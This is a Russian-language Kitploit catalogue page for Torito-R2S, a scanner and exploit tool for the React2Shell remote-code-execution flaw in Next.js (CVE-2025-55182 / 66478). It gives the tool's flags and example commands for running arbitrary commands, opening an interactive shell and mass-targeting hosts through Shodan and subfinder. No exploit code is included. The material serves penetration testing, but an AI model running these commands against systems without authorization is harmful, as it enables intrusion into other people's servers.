Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/toritoio/torito-r2s
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеПеречисление Поддоменов
GitHubtoritoio/torito-r2s

Torito-R2S

Torito React2Shell сканер и эксплойт-инструмент (CVE-2025-55182 / 66478)

Репозиторий
418 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Torito-R2S — Torito React2Shell сканер и эксплойт-инструмент (CVE-2025-55182 / 66478) | Kitploit
Сайт

Torito React2Shell Сканер и эксплойт-инструмент (CVE-2025-55182 / 66478)

Torito Logo

Сканер, ориентированный на обнаружение, для целей Next.js RSC с опциональными режимами подтверждения PoC и эксплойта/оболочки. Используйте только на системах, которые вы уполномочены тестировать.

Требования

  • Python 3.9+
  • pip install -r requirements.txt
  • Бинарник Subfinder в PATH для --subfinder (установка через Homebrew brew install subfinder или Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; проект: https://github.com/projectdiscovery/subfinder)
  • Использование Shodan требует pip install shodan (уже в requirements) и ключа: export SHODAN_API_KEY=... с доступными кредитами запросов

Использование

root@kitploit:~
python3 torito_r2s.py --help

Флаги

Примеры

Безопасная проверка (одна цель)

root@kitploit:~
python3 torito_r2s.py -u https://target.com

Подтверждение PoC (перенаправление по побочному каналу)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --confirm

Эксплойт с пользовательской командой

root@kitploit:~
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"

Интерактивная оболочка при первом попадании

root@kitploit:~
python3 torito_r2s.py -u https://target.com --shell

Сканирование списка с экспортом

root@kitploit:~
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv

Только Shodan (требуется ключ и кредиты)

root@kitploit:~
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm

Только Subfinder

root@kitploit:~
python3 torito_r2s.py --subfinder target.com --confirm

Прокси (Burp/Caido)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm

Конвейер через stdin

root@kitploit:~
cat urls.txt | python3 torito_r2s.py --confirm

Примечания к выводу

  • Таблица показывает отпечаток (NX/AR), проверку, подтверждение, эксплойт.
  • Дайджесты эксплойта декодируются из base64, когда это возможно; подробный режим показывает превью.
  • JSON/CSV включают сырой дайджест и декодированный вывод (если есть).

Безопасность

  • Только для авторизованного тестирования.
  • Запуск по умолчанию — неразрушающая проверка; эксплойт выполняется только с --exploit-cmd или --shell.
Скачать инструмент
ФлагОписаниеПо умолчанию
-u, --url URLURL одной цели—
-l, --list FILEФайл с целями (по одной на строку)—
--subfinder DOMAINЗапустить subfinder для домена и добавить результаты—
--shodan QUERYПоиск Shodan (требуется SHODAN_API_KEY с кредитами)—
--shodan-limit NМакс. результатов Shodan на запрос100
-t, --threads NПараллельность20
--timeout SECТаймаут запроса10
--proxy URLHTTP/HTTPS прокси—
--confirmЗапустить PoC на основе перенаправления после проверкиoff
--exploit-cmd "CMD"Запустить RCE полезную нагрузку с командой—
--shell, -iОткрыть интерактивную оболочку при первом успешном эксплойте (по умолчанию команда id)off
--json-out FILEСохранить результаты в JSON—
--csv-out FILEСохранить результаты в CSV—
-v, --verboseПоказывать декодированные выводы/диджесты в таблицеoff